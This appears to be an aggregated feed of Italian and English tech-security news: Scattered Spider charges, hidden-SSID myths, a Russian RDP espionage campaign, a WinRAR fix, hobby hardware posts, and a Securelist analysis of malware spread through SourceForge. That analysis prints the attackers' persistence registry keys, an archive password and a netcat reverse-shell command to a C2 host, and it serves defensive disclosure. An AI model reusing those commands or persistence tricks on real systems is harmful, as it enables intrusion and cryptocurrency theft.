Un membro del gruppo hacker di Scattered Spider, è stato accusato di furto di criptovaluta su larga scala e operazioni di hacking dei sistemi aziendali. Noah Michael Urban è stato arrestato all’inizio del 2024 , patteggiando le accuse in Florida, dove è stato accusato di frode e furto di identità. Ora rischia fino a 60 anni di carcere.

Secondo gli inquirenti, Urban, era un membro chiave di uno dei gruppi di hacker più aggressivi degli ultimi anni. Scattered Spider è diventato famoso per l’utilizzo del SIM Swapping, un metodo che consente di prendere il controllo del numero di telefono della vittima e di aggirare l’autenticazione a due fattori. Grazie a questa tecnica il gruppo ha avuto accesso a portafogli crittografici, sistemi aziendali e documenti.

Urban e i suoi complici hanno operato tra agosto 2022 e marzo 2023. Durante questo periodo, secondo l’accusa, sono riusciti a rubare milioni di dollari in criptovaluta, nonché a penetrare nell’infrastruttura IT di grandi aziende, da cui sono stati rubati dati riservati. Durante la perquisizione, a casa di Urban sono stati sequestrati beni digitali per un valore di 2,89 milioni di dollari, conservati sul suo computer di casa.

Secondo i documenti del caso, tre imputati sono stati arrestati, mentre la sorte degli altri due resta sconosciuta. Si stima che i danni totali causati dalle azioni del gruppo siano compresi tra 9,5 e 25 milioni di dollari. Urban si è impegnato a risarcire più di 13 milioni di dollari a favore di più di 30 vittime e ha inoltre rinunciato a tutti i fondi digitali sequestrati.

Gli investigatori hanno scoperto che sotto gli pseudonimi “Sosa”, “Elijah” e “King Bob”, Urban, insieme ad altri membri della “comunità”, era attivamente coinvolto nell’hacking di account, negli attacchi di phishing e nell’utilizzo di dati rubati per ottenere l’accesso ai portafogli crittografici. In un caso, ha hackerato l’account del conglomerato mediatico americano AOL, ha eseguito con successo uno scambio di SIM tramite l’operatore AT&T e ha rubato circa 374 mila dollari.

Durante gli interrogatori, Urban ha confermato di aver ricevuto criptovaluta esclusivamente tramite attività criminali nell’ambito di Scattered Spider. A sole 16 vittime sono stati rubati oltre 2,6 milioni di dollari. Secondo le sue stime, tra gennaio 2021 e marzo 2023 ha guadagnato personalmente diversi milioni di dollari e ha preso parte a furti per importi ancora maggiori.

In passato i giornalisti avevano anche collegato Urban ad attacchi contro musicisti famosi e a fughe di notizie di album inediti. Secondo l’atto d’accusa, avrebbe collaborato con Ahmed Hossam Elbadewi, Evans Osiebo, Joel Evans, Tyler Buchanan e altri. Tra le vittime figurano aziende operanti nei settori dell’intrattenimento, delle telecomunicazioni, delle tecnologie cloud e dei servizi di criptovaluta.

Scattered Spider ha colpito anche MGM e Caesars nel 2023, così come gli attacchi informatici a Coinbase, Twilio, Mailchimp, LastPass, Riot Games e Reddit. Secondo i dati La recente campagna di phishing del gruppo Group-IB ha portato alla compromissione di circa 10.000 account di 136 organizzazioni.

Le autorità statunitensi sottolineano che i membri di Scattered Spider sono madrelingua inglese. Ciò a conferito loro un vantaggio nell’ingegneria sociale. Hanno utilizzato con successo tattiche di Man in the Middle e attacchi di phishing tramite SMS,

L'articolo Il 19enne membro della cyber-gang d’élite Scattered Spider rischia 60 anni di reclusione proviene da il blog della sicurezza informatica.

Recently, we noticed a rather unique scheme for distributing malware that exploits SourceForge, a popular website providing software hosting, comparison, and distribution services. The site hosts numerous software projects, and anyone can upload theirs. One such project, officepackage, on the main website sourceforge.net, appears harmless enough, containing Microsoft Office add-ins copied from a legitimate GitHub project. The description and contents of officepackage provided below were also taken from GitHub.

Description of the “officepackage” project

Few know that projects created on sourceforge.net get a sourceforge.io domain name and web hosting services. Pages like that are well-indexed by search engines and appear in their search results.

Example of a search query and results containing officepackage.sourceforge.io

The project under investigation has been assigned the domain officepackage.sourceforge[.]io, but the page displayed when you go to that domain looks nothing like officepackage on sourceforge.net. Instead of the description copied from GitHub, the visitor is presented with an imposing list of office applications complete with version numbers and “Download” buttons.

The project as seen on the officepackage.sourcefoge.io domain

Hovering over one of the buttons reveals a seemingly legit URL in the browser status bar: https[:]//loading.sourceforge[.]io/download. It is easy to make the mistake of associating that URL with officepackage, as the buttons are on that project’s page. However, the loading.sourceforge.io domain suggests a different project on sourceforge.net, named loading.

URL associated with the “Download” button

Clicking the link redirects to a page with yet another “Download” button, this time in English.

Page for downloading the suspicious archive

Clicking that button finally downloads a roughly seven-megabyte archive named vinstaller.zip. This raises some red flags, as office applications are never that small, even when compressed.

The infection chain: from searching for office software to downloading an installer

The downloaded archive contains another password-protected archive, installer.zip, and a Readme.txt file with the password.

Contents of vinstaller.zip

Inside installer.zip is a file named installer.msi. This is a Windows Installer file that exceeds 700 megabytes. Apparently, the large size is intended to convince users they are looking at a genuine software installer. Attackers use the file pumping technique to inflate the file size by appending junk data. The file in question was padded with null bytes. After we stripped the junk bytes, its true size was 7 megabytes.

Contents of installer.zip

Running the installer creates several files, with two being of interest to us: UnRAR.exe (a console archive utility) and a password-protected archive named 51654.rar. The installer then executes an embedded Visual Basic script. Attackers have long distributed password-protected archives along with unpacking utilities, passing the password via the command line. However, this case has an intermediary step. The installer files lack an archive password. Instead, to continue the infection chain, the VB script runs a PowerShell interpreter to download and execute a batch file, confvk, from GitHub. This file contains the password for the RAR archive. It also unpacks malicious files and runs the next-stage script.

The infection chain: from launching the installer to downloading the confvk batch script

Here is a breakdown of how the batch script works. First, it checks for an existing infection by searching for the AutoIt interpreter at a specific path. If AutoIt is found, the script deletes itself and exits. If not, the script checks for processes associated with antivirus software, security solutions, virtual environments, and research tools. If it detects anything like that, it deletes itself.

If both checks pass, the script unpacks the RAR archive and runs two PowerShell scripts within its code.
"%ProgramData%\dist\UnRAR.exe" x -y -p147852369 "%ProgramData%\dist\51654.rar" "%ProgramData%\dist\"

Command to unpack the RAR archive executed by the batch file

One of the PowerShell scripts sends a message to a certain chat using the Telegram API. The message contains system information, the infected device’s external IP address and country, CPU name, operating system, installed antivirus, username, and computer name.

Code snippet from confvk with commands to unpack the malicious archive and run the Telegram file-sending script

The other PowerShell script downloads another batch file, confvz, to process the files that were extracted from the RAR archive.

Contents of the RAR archive

The contents of the archive can be seen in the screenshot above. Below is a summary of each file.

The confvz batch file creates three subdirectories at %ProgramData% and moves the unpacked archive files into those. The first subdirectory receives Input.exe and Icon.dll, the second gets another Input.exe copy with Kape.dll, and the third gets all netcat files. The batch file then creates ini.cmd and init.cmd batch scripts at %USERPROFILE%\Cookies\ to run the files it copied. These scripts execute Input.exe (the AutoIt interpreter), passing the paths to Icon.dll and Kape.dll (both containing compressed AutoIt scripts) as arguments.

Contents of the confvz batch file

Next, confvz generates keys in the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\*. These link to the ini.cmd and init.cmd batch files. The keys allow running files using shortened names. For example, the registry key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\install.exe"::"%USERPROFILE%\Cookies\ini.cmd
launches ini.cmd when running install.exe. Similarly, start.exe is registered as a link to init.exe, and Setup.exe links to the system utility %WINDIR%\System32\oobe\Setup.exe, normally launched during OS installation. We will revisit this utility later.

Then confvz creates services named NetworkConfiguration and PerformanceMonitor to autostart the batch files, and a service named Update to directly run the AutoIt interpreter without intermediate batch files.

Additionally, as a backup autostart method, confvz adds this registry key:
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe"::Debugger="%WINDIR%\System32\cmd.exe /c start start.exe"
This runs a debugger when MicrosoftEdgeUpdate.exe is started. The debugger is set to execute start.exe, which, based on the earlier registry keys, points to init.cmd.

Using the built-in WMIC utility, an event filter is created to trigger a handler every 80 seconds. While disabled by default in more recent Windows versions, WMIC still functions in older systems.

The handler executes the following command:
ShellExperienceHost.exe --ssl apap.app 445 -e cmd.exe
ShellExperienceHost.exe is the netcat executable from the malicious archive. The arguments above make the utility establish an encrypted connection with the C2 server apap[.]app on port 445 and launch a command-line interpreter with redirected input/output through that connection. This essentially creates a remote command line with apap[.]app:445 as the C2 server.

Finally, confvz creates a file:
%WINDIR%\Setup\Scripts\ErrorHandler.cmd
This is a custom script you can build in Windows to streamline troubleshooting during OS installation. If a critical error occurs, the %System32%\oobe\Setup.exe utility finds and executes this file. However, the attackers have found a way to exploit it for automatic startup. They achieve this by again using the operating system’s built-in WMIC utility to establish an event filter that triggers the handler every 300 seconds. The handler is specified as %WINDIR%\System32\cmd.exe /c start Setup.exe, while Setup.exe, according to the registry keys created earlier, references the utility %WINDIR%\System32\oobe\Setup.exe, which executes ErrorHandler.cmd upon launch. The ErrorHandler.cmd file contains a short PowerShell script that uses the Telegram API to retrieve and execute a text string. This is another remote command line, but its output is not sent anywhere.

The infection chain: from executing confvk to setting up all the auto-start methods

The key malicious actions in this campaign boil down to running two AutoIt scripts. Icon.dll restarts the AutoIt interpreter and injects a miner into it, while Kape.dll does the same but injects ClipBanker. ClipBanker is a malware family that replaces cryptocurrency wallet addresses in the clipboard with the attackers’ own. Users of crypto wallets typically copy addresses instead of typing them. If the device is infected with ClipBanker, the victim’s money will end up somewhere entirely unexpected.

Victims

The officepackage.sourceforge[.]io site has a Russian interface, suggesting a focus on Russian-speaking users. Our telemetry indicates that 90% of potential victims are in Russia, where 4,604 users encountered the scheme between early January and late March.

Takeaways

Distributing malware disguised as pirated software is anything but new. As users seek ways to download applications outside official sources, attackers offer their own. They keep looking for new ways to make their websites look legit. The scheme described here exploits SourceForge feature of creating a sourceforge.io subdomain for each sourceforge.net repository.

The persistence methods are worthy of note as well. Attackers secure access to an infected system through multiple methods, including unconventional ones. While the attack primarily targets cryptocurrency by deploying a miner and ClipBanker, the attackers could sell system access to more dangerous actors.

We advise users against downloading software from untrusted sources. If you are unable to obtain some software from official sources for any reason, remember that seeking alternative download options always carries higher security risks.

securelist.com/miner-clipbanke…

We know you’ve seen them: the time-lapses that show a 3D print coming together layer-by-layer without the extruder taking up half the frame. It takes a little extra work compared to just pointing a camera at the build plate, but it’s worth it to see your prints materialize like magic.

Usually these are done with a plugin for OctoPrint, but with all due respect to that phenomenal project, it’s a lot to get set up if you just want to take some pretty pictures. Which is why [Whopper Printing] put together the LayerLapse. This small PCB is designed to trigger your DSLR or mirrorless camera once its remotely-mounted hall effect sensor detects the presence of a magnet.
The remote hall effect sensor.
The idea is that you just need to stick a small magnet to your extruder, add a bit of extra G-code that will park it over the sensor at the end of each layer, and you’re good to go. There’s even a spare GPIO pin broken out should you want to trigger something else on each layer of your print. Admittedly we can’t think of anything else right now that would make sense, other than some other type of camera, but we’re sure some creative folks out there could put this feature to use.

Currently, [Whopper Printing] is selling the LayerLapse as a finished product, though it does sound like a kit version is in the works. There’s also instructions for building a DIY version of the hardware using your microcontroller of choice. Whether you buy or build the hardware, the firmware is available under the MIT license for your tinkering pleasure.

Being hardware hackers, we appreciate the stand-alone nature of this solution. But if you’re already controlling your printer through OctoPrint, you’re probably better off just setting up one of the available time-lapse plugins.

hackaday.com/2025/04/08/layerl…

La sicurezza, soprattutto quando si parla di reti WiFi, è spesso oggetto di fraintendimenti e luoghi comuni. In questa serie di articoli della nostra Rubrica WiFI, vogliamo sfatare alcuni dei falsi miti più diffusi. Offrendo spiegazioni chiare, dati concreti e consigli pratici. L’obiettivo è aiutarti a muoverti con maggiore consapevolezza nel mondo delle connessioni senza fili

In ogni articolo affronteremo un mito, ne analizzeremo le origini, presenteremo evidenze tecniche e concluderemo con le nostre considerazioni e suggerimenti.

Cominciamo da uno dei più comuni: nascondere il nome della rete (SSID) è davvero un modo efficace per aumentare la sicurezza?

Come Funziona:

Nascondere la rete WiFi significa semplicemente disabilitare la trasmissione del SSID (Service Set Identifier) nei beacon frame. Ovvero disabilitare i segnali periodici inviati dall’access point per annunciare la presenza della rete WiFi ai dispositivi vicini.

In pratica, il nome della rete non compare più nella lista delle reti disponibili. Tuttavia, questa misura può essere considerata “puramente cosmetica” e non offre alcuna reale protezione, anzi può diventare un punto debole.

Vediamo cosa succede nel dettaglio:

1. L’access point smette di annunciare attivamente la rete:
   Disabilitando il broadcast del SSID, l’AP continua a inviare i beacon frame¹, ma il campo SSID viene lasciato vuoto o impostato come “null”. Questo fa sì che il nome della rete sembri nascosto.
2. I client devono inviare richieste attive per trovare la rete:
   I client configurati per connettersi a una rete nascosta non possono più scoprirla passivamente. Devono quindi inviare probe request² attive per cercare quella rete specifica, includendo nel pacchetto proprio l’SSID.
3. L’SSID è incluso in chiaro nelle probe request:
   Anche se l’AP non annuncia più la rete, i dispositivi client rivelano comunque l’SSID ogni volta che tentano di connettersi. Queste richieste contengono il nome della rete in chiaro e possono essere facilmente intercettate.
4. Processo di connessione e relative informazioni transitano in chiaro:
   Le probe request e le relative risposte non sono cifrate. Questo significa che chiunque stia ascoltando il traffico WiFi – con strumenti liberamente disponibili e di facile utilizzo – può rilevare il nome della rete nascosta in pochi secondi.

Evidenza

youtube.com/embed/dy6nrzO807g?…

⚠️ Questo video è a scopo educativo! Non utilizzarlo per attività illegali o senza autorizzazione.⚠️

In questo video realizzato da Matteo Brandi vogliamo dare un evidenza pratica su:

✅ Come funzionano le reti WiFi nascoste

✅ Quali strumenti usare per rilevare un SSID nascosto

✅ Come scoprire il nome della rete in modo semplice e pratico

Conclusione

Come mostrato nel video qui sopra, nascondere il nome della rete (SSID) non offre alcun reale vantaggio in termini di sicurezza. Anzi:

• Gli hacker possono intercettare il nome della rete in pochi minuti, rendendo questa “protezione” del tutto illusoria.
• Una rete nascosta può addirittura attirare più attenzione, perché una configurazione non standard può essere vista come un obiettivo potenzialmente interessante da esplorare.
• Nascondere l’SSID non è una misura di sicurezza efficace: il nome della rete può essere facilmente rilevato anche con strumenti di base, rendendo questa pratica inutile contro qualsiasi attacco, anche non sofisticato.

Nei prossimi articoli affronteremo altri falsi miti, come:

• “Se non faccio pagamenti o login, sono al sicuro”
• “Non corro rischi se mi connetto solo a siti HTTPS”
• “Se uso una VPN, sono completamente al sicuro”
• “Il WiFi aperto è solo per i guest, quindi non ci sono rischi per l’azienda”

Continua a seguirci la nostra Rubrica WiFI per navigare informato, protetto e consapevole.

1. Beacon Frame
   Un beacon frame è un tipo di frame di gestione utilizzato nelle reti WLAN basate sullo standard IEEE 802.11. Contiene informazioni fondamentali sulla rete e viene trasmesso periodicamente per:
   – Annunciare la presenza di una rete wireless (WLAN);
   – Fornire un segnale di sincronizzazione ai dispositivi connessi, aiutandoli a mantenere la comunicazione allineata.
   Come Spiegato nell’articolo “Dentro le reti wireless-ieee-802-11: Architettura e Segnale WiFi”
   Nelle reti con infrastruttura (in modalità Infrastructure Basic Service Set, BSS), i beacon frame vengono inviati dall’access point (AP).
   Nelle reti ad hoc (o Independent BSS, IBSS), invece, la generazione dei beacon è distribuita tra i vari dispositivi partecipanti.
   NB: Dobbiamo sempre tenere presente gli effetti sull’ambiente radio. Nel caso della banda a 2,4 GHz, se si configurano più di 15 SSID su canali non sovrapposti (o più di 45 SSID in totale), i beacon frame iniziano a occupare una quantità significativa di tempo trasmissivo (air time).
   Questo fenomeno può degradare sensibilmente le prestazioni della rete, anche se la maggior parte delle reti è inattiva, poiché i beacon continuano comunque a essere trasmessi periodicamente. ↩︎
2. Probe Request: Una probe request è un messaggio inviato da un dispositivo client (come uno smartphone o un laptop) per cercare reti WiFi disponibili. Quando un dispositivo tenta di connettersi a una rete WiFi nascosta o salvata, invia probe request specifiche contenenti l’SSID della rete che sta cercando. Questi messaggi non sono cifrati, quindi possono essere intercettati facilmente da chiunque stia monitorando il traffico di rete. ↩︎

L'articolo Proteggere il WiFi nascondendo il nome? Si tratta di una falsa sicurezza proviene da il blog della sicurezza informatica.

[JesseDarr] recently wrote in to tell us about their dynamic Arm for Robitc Mischief (dARM), a mostly 3D printed six degrees of freedom (6DOF) robotic arm that’s designed to be stronger and more capable than what we’ve seen so far from the DIY community.

The secret? Rather than using servos, dARM uses brushless DC (BLDC) motors paired with ODrive S1 controllers. He credits [James Bruton] and [Skyentific] (two names which regular Hackaday readers are likely familiar with) for introducing him to not only the ODrive controllers, but the robotics applications for BLDCs in the first place.

dARM uses eight ODrive controllers on a CAN bus, which ultimately connect up to a Raspberry Pi 4B with a RS485 CAN Hat. The controllers are connected to each other in a daisy chain using basic twisted pair wire, which simplifies the construction and maintenance of the modular arm.

As for the motors themselves, the arm uses three different types depending on where they are located, with three Eaglepower 8308 units for primary actuators, a pair of GB36-2 motors in the forearm, and finally a GM5208-24 for the gripper. Together, [JesseDarr] says the motors and gearboxes are strong enough to lift a 5 pound (2.2 kilogram) payload when extended in a horizontal position.

The project’s documentation includes assembly instructions for the printed parts, a complete Bill of Materials, and guidance on how to get the software environment setup on the Raspberry Pi. It’s not exactly a step-by-step manual, but it looks like there’s more than enough information here for anyone who’s serious about building a dARM for themselves.

If you’d like to start off by putting together something a bit easier, we’ve seen considerably less intimidating robotic arms that you might be interested in.

youtube.com/embed/Pv4tDsQZbRw?…

hackaday.com/2025/04/08/printe…

Il Foglio AI. Ma perché?

spreaker.com/episode/dk-9x25-i…

Il Google Threat Intelligence Group (GTIG) ha identificato una nuova ondata di attacchi informatici attribuendola a un gruppo denominato UNC5837.

La campagna, osservata a partire da ottobre 2024, adotta un approccio unico: l’invio di e-mail di phishing contenenti allegati in formato .rdp. Questi file, una volta aperti, avviano una connessione RDP dalla macchina della vittima a un server controllato dagli aggressori, senza mostrare i consueti banner di avviso per la sessione interattiva.

In questa sofisticata campagna di spionaggio, rivolta a istituzioni governative e militari europee, alcuni hacker ritenuti collegati ad attori statali russi hanno sfruttato una funzionalità meno nota del protocollo RDP (Remote Desktop Protocol) di Windows per infiltrarsi nei sistemi.

Le prove suggeriscono che questa campagna potrebbe aver comportato l’uso di uno strumento proxy RDP come PyRDP per automatizzare attività dannose come l’esfiltrazione di file e l’acquisizione degli appunti. Questa tecnica è stata precedentemente soprannominata “Rogue RDP”.
Esempio della campagna di phishing (fonte Google)
Le e-mail contenevano file .rdp firmati, con certificati SSL validi, per aggirare le misure di sicurezza che avrebbero avvisato gli utenti di potenziali rischi. Questi file sono configurati per mappare le risorse dal computer della vittima al server dell’attaccante.

La campagna ha probabilmente consentito agli aggressori di leggere le unità delle vittime, rubare file, catturare dati degli appunti (incluse le password) e ottenere variabili di ambiente delle vittime. Sebbene non abbiamo osservato l’esecuzione diretta di comandi sulle macchine delle vittime, gli aggressori potrebbero presentare applicazioni ingannevoli per phishing o ulteriori compromissioni.

L’obiettivo principale della campagna sembra essere lo spionaggio e il furto di file, sebbene la piena portata delle capacità dell’aggressore rimanga incerta. Questa campagna funge da duro promemoria dei rischi per la sicurezza associati alle oscure funzionalità RDP, sottolineando l’importanza della vigilanza e della difesa proattiva.

L'articolo RDP utilizzato dagli hacker russi per colpire le istituzioni governative e militari europee proviene da il blog della sicurezza informatica.

Should you travel around Europe, you may notice that things in France are ever so slightly different. Not necessarily better or worse, simply that the French prefer to plough their own furrow rather than importing cultural tends from their neighbors.

In the 1980s this was evident in their home computers, because as well as a Minitel terminal in your house, you could have an all-French machine plugged into your TV. [Retro Krazy] has just such a machine — it’s a Matra Hachette Alice 32, and its red plastic case hides hardware any of us would have been proud to own back in the day.

At first sight it appears superficially similar to a Sinclair Spectrum, with its BASIC keywords next to the keys. But under that slightly calculator style AZERTY keyboard is an entirely different architecture, a Motorola 6803. The first Alice computer was a clone of a Radio Shack model, and while this one has no compatibility with its predecessor it retains some silicon choices. On the back are a series of DIN sockets, one for a SCART adapter, and more for serial connectivity and a cassette deck. The overall impression is of a well-engineered machine, even if that red color is a little garish.

The Alice hasn’t appeared here on its own before, but we have taken a look at French retrocomputers here in the past.

youtube.com/embed/_Pr--TXhnX4?…

hackaday.com/2025/04/07/the-19…

L’8 aprile 2025 si celebra la quinta edizione dell’Identity Management Day, un’iniziativa promossa dalla Identity Defined Security Alliance (IDSA) e dalla National Cybersecurity Alliance (NCA). Questa giornata ha l’obiettivo di sensibilizzare individui e organizzazioni sull’importanza della gestione e protezione delle identità digitali, evidenziando le migliori pratiche per prevenire violazioni e furti di dati personali.

L’Importanza della Gestione delle Identità

Nell’era digitale, le identità rappresentano il nuovo perimetro della sicurezza informatica. Secondo il 2020 Verizon Data Breach Investigations Report, fino all’81% delle violazioni informatiche legate all’hacking sfruttano password deboli, rubate o compromesse. Questo sottolinea la necessità di adottare misure proattive nella gestione delle credenziali e nell’implementazione di strategie di sicurezza basate sull’identità.​National Cybersecurity Alliance

Pertanto occorre implementare un approccio alla sicurezza che ponga l’identità al centro, implementando principi di zero trust e autenticazione multifattoriale. ​Cyber Daily Per celebrare l’Identity Management Day 2025, l’IDSA ha organizzato una conferenza virtuale globale con sessioni che coprono le regioni delle Americhe, EMEA e Oceania-Asia. Il tema di quest’anno, “Identità Esistenziale”, esplora l’evoluzione delle identità umane e non umane nel contesto dell’intelligenza artificiale e delle nuove tecnologie. ​Days Of The Year+2Identity Defined Security Alliance+2Identity Defined Security Alliance+2

Una delle sessioni principali, intitolata “Più Umano del Umano: Una Storia Avvincente su Macchine, AI e Identità”, sarà presentata da Henrique Teixeira di Saviynt. Questa sessione esplorerà l’impatto dell’intelligenza artificiale sulla gestione delle identità e sulla sicurezza informatica.

Best Practices per la Protezione delle Identità Digitali

In occasione dell’Identity Management Day, è fondamentale adottare misure concrete per proteggere le proprie identità digitali. Ecco alcune best practices consigliate:​

• Utilizzare l’Autenticazione Multifattoriale (MFA): Aggiungere un ulteriore livello di sicurezza oltre alla password per accedere ai propri account.​
• Aggiornare Regolarmente le Password: Modificare le password periodicamente e non riutilizzarle su più account.​
• Essere Vigili contro il Phishing: Prestare attenzione a e-mail o messaggi sospetti che richiedono informazioni personali o credenziali di accesso.​
• Monitorare le Attività dei Conti: Controllare regolarmente gli estratti conto bancari e le attività degli account online per individuare eventuali attività non autorizzate.​

Implementando queste pratiche, individui e organizzazioni possono ridurre significativamente il rischio di violazioni legate all’identità.​Cyber Daily

Fabio Fratucello, Field CTO World Wide, CrowdStrike ha riportato recentemente “Oggi gli avversari non forzano l’ingresso: accedono con le credenziali. Gli attaccanti hanno abbandonato i metodi tradizionali basati su malware, preferendo sfruttare le lacune nella gestione delle identità e utilizzare credenziali rubate per infiltrarsi silenziosamente negli ambienti. Una volta all’interno, essi agiscono come utenti legittimi, eludendo gli strumenti di sicurezza tradizionali e muovendosi lateralmente tra domini di identità, endpoint e cloud. Come evidenziato nel Global Threat Report 2025 di CrowdStrike, il 79% degli accessi iniziali oggi avviene infatti senza l’uso di malware, e l’attività degli access broker è aumentata del 50% su base annua. La realtà è che le misure di sicurezza tradizionali, un tempo efficaci contro gli attacchi guidati da malware, sono oggi inadeguate. L’Identity Management Day rappresenta per le organizzazioni un’occasione per rivalutare la propria postura in tema di sicurezza delle identità e per adottare un approccio proattivo, fondato sull’identità, alla difesa. Ciò include l’implementazione dei principi zero-trust, il monitoraggio continuo delle identità, il rafforzamento dell’autenticazione tramite MFA (autenticazione a più fattori) e metodi passwordless, il dispiegamento di sistemi di rilevamento delle minacce e di intelligence basati su intelligenza artificiale, e l’eliminazione dei privilegi di accesso non necessari. Inoltre, le organizzazioni hanno bisogno di una piattaforma di sicurezza unificata, alimentata da intelligence in tempo reale, in grado di correlare le attività relative a identità, cloud ed endpoint, per offrire una visibilità completa attraverso tutti i domini ed eliminare i punti ciechi. Adottando una strategia di sicurezza incentrata sull’identità e una piattaforma unificata, le organizzazioni possono concentrarsi sull’obiettivo principale: fermare le violazioni“.

Conclusione

L’Identity Management Day serve come promemoria dell’importanza cruciale della gestione delle identità nell’attuale panorama digitale. Partecipando a eventi educativi e adottando misure proattive, possiamo tutti contribuire a creare un ambiente online più sicuro. Per ulteriori informazioni e per partecipare alle iniziative, visita il sito ufficiale dell’Identity Defined Security Alliance.

L'articolo Identity Management Day: Proteggere le Identità nell’Era Digitale proviene da il blog della sicurezza informatica.

WinRAR ha corretto una vulnerabilità recentemente che consentiva di aggirare la funzionalità di sicurezza Mark of the Web (MotW) di Windows ed eseguire codice sul computer della vittima.

La vulnerabilità è identificata con l’identificatore CVE-2025-31334 (6,8 punti sulla scala CVSS) riguarda tutte le versioni di WinRAR, tranne la 7.11.

Mark of the Web è una funzionalità di sicurezza di Windows che viene utilizzata per contrassegnare i file potenzialmente pericolosi scaricati da Internet. Quando si apre un file eseguibile contrassegnato come MotW, Windows avverte l’utente che il file è stato scaricato da Internet e potrebbe essere pericoloso, proponendo di continuare a eseguirlo o di chiuderlo.

Una vulnerabilità in WinRAR consentiva di aggirare l’avviso MotW quando si apriva un collegamento simbolico (symlink) che puntava a un file eseguibile.

Di conseguenza, un aggressore potrebbe eseguire codice arbitrario utilizzando un collegamento simbolico appositamente preparato. Si noti che un collegamento simbolico può essere creato solo in Windows con diritti di amministratore.

Inoltre, a partire dalla versione 7.10, WinRAR è in grado di rimuovere le informazioni MotW (come i dati sulla posizione e l’indirizzo IP) dal flusso di dati che potrebbero rappresentare una minaccia per la privacy.

L'articolo Una falla su WinRAR è stata corretta! Aggirava la sicurezza di Windows per eseguire codice malevolo! proviene da il blog della sicurezza informatica.

We’ve seen tons of projects lately using the ESP32-C3, and for good reason. The microcontroller has a lot to offer, and the current crop of tiny dev boards sporting it make adding a lot of compute power to even the smallest projects dead easy. Not so nice, though, is the poor WiFi performance of some of these boards, which [Peter Neufeld] addresses with this quick and easy antenna.

There are currently a lot of variations of the ESP32-C3 out there, sometimes available for a buck a piece from the usual suspects. Designs vary, but a lot of them seem to sport a CA-C03 ceramic chip antenna at one end of the board to save space. Unfortunately, the lack of free space around the antenna makes for poor RF performance. [Peter]’s solution is a simple antenna made from a 31-mm length of silver wire. One end of the wire is formed into a loop by wrapping it around a 5-mm drill bit and bending it perpendicular to the remaining tail. The loop is then opened up a bit so it can bridge the length of the ceramic chip antenna and then soldered across it. That’s all it takes to vastly improve performance as measured by [Peter]’s custom RSSI logger — anywhere from 6 to 10 dBm better. You don’t even need to remove the OEM antenna.

The video below, by [Circuit Helper], picks up on [Peter]’s work and puts several antenna variants to further testing. He gets similarly dramatic results, with 20 dBm improvement in some cases. He does note that the size of the antenna can be a detriment to a project that needs a really compact MCU and tries coiling up the antenna, with limited success. He also did a little testing to come up with an optimal length of 34 mm for the main element of the antenna.

There seems to be a lot of room for experimentation here. We wonder how mounting the antenna with the loop perpendicular to the board and the main element sticking out lengthwise would work. We’d love to hear about your experiments, so make sure to ping us with your findings.

youtube.com/embed/UHTdhCrSA3g?…

hackaday.com/2025/04/07/simple…

The advantage of a radio-controlled clock that receives the time signal from WWVB is that you never have to set it again. Whether it’s a little digital job on your desk, or some big analog wall clock that’s hard to access, they’ll all adjust themselves as necessary to keep perfect time. But what if the receiver conks out on you?

Well, you’d still have a clock. But you’d have to set it manually like some kind of Neanderthal. That wasn’t acceptable to [jim11662418], so after he yanked the misbehaving WWVB receiver from his clock, he decided to replace it with an ESP8266 that could connect to the Internet and get the current time via Network Time Protocol (NTP).

This modification was made all the easier by the fact that the WWVB receiver was its own PCB, connected to the clock’s main board by three wires: one for the clock signal, another that gets pulled low when the clock wants to turn on the receiver (usually these clocks only update themselves once a day), and of course, ground. It was simply a matter of connecting the ESP8266 dev board up to the two digital lines and writing some code that would mimic the responses from the original receiver.

If you take a look through the provided source code, a comment explains that the WWVB signal is recreated based on the official documentation from the National Institute of Standards and Technology (NIST) website. There are functions in the code to bang out the 500 ms “one” and 200 ms “zero” bits, and once the microcontroller has picked up the correct time from the Internet, they’re called in quick succession to build the appropriate time signal. As such, this code should work on any clock that has an external WWVB receiver like this, but as always, your mileage may vary.

This is a very clean hack, but if you wanted to pull off something similar without having to gut all the clocks in your house, we’ve seen a WWVB simulator that can broadcast an NTP-backed time signal to anything listening nearby.

hackaday.com/2025/04/07/atomic…

I tempi stanno cambiando.

Un tempo la sorveglianza era silenziosa, nascosta tra le pieghe del codice e delle reti. Oggi, invece, si presenta a volto scoperto, con l’appoggio della politica e la benedizione di normative che la vogliono rendere legale, strutturata, persino necessaria. Dopo Echelon, il Datagate con Edward Snowden nel 2013 accese i riflettori sulle pratiche di sorveglianza di massa svolta dalla NSA e dell’FBI. Tale scandalo mostrava come le democrazie più avanzate non siano immuni dal desiderio di ascoltare tutto, sempre.

Poi è arrivato Vault 7, la più grande fuga di documenti della CIA mai registrata. In questa fuga di dati veniva mostrato come gli Stati Uniti riuscivano a infiltrarsi in smartphone, smart TV e computer di mezzo mondo. Fino ad allora, le backdoor erano qualcosa di sussurrato nei corridoi dell’intelligence, strumenti d’uso esclusivo delle agenzie, senza discussione pubblica.

Ma oggi il dibattito si è fatto politico, pubblico, globale.

La dichiarazione di Trump di Novembre

A novembre 2024, Donald Trump ha dichiarato che servono “normative flessibili in termini di intelligence”. Sostenne apertamente l’utilizzo di tecnologie di tipo spyware per proteggere la sicurezza nazionale. Un’affermazione forte, che ha avuto conseguenze quasi immediate. Nel giro di qualche mese, diversi vertici dell’NSA sono stati rimossi dopo incontri a porte chiuse con Elon Musk. L’impressione è che stia prendendo forma una nuova dottrina americana: la sorveglianza legalizzata, esplicita, che non ha più bisogno di nascondersi.

Pertanto la tecnologia spyware riceverà un “secondo vento”. È probabile che le aziende che producono programmi come NSO Group e Paragon trovino sostegno nella nuova amministrazione. Questo nonostante le critiche ai loro strumenti per violare i diritti umani.

Nel frattempo, Cina e Russia osservano. Loro il modello lo hanno già consolidato da tempo: sorveglianza pervasiva, controllo dei dati, nessuna illusione sulla privacy. Ma la differenza – sottolineano spesso i governi occidentali – è che quei due paesi sono sotto regime.

L’Occidente, invece, è un mondo di diritti e trasparenza. Almeno, lo era.

La discussione sulle Backdoor in Europa e nel Regno Unito

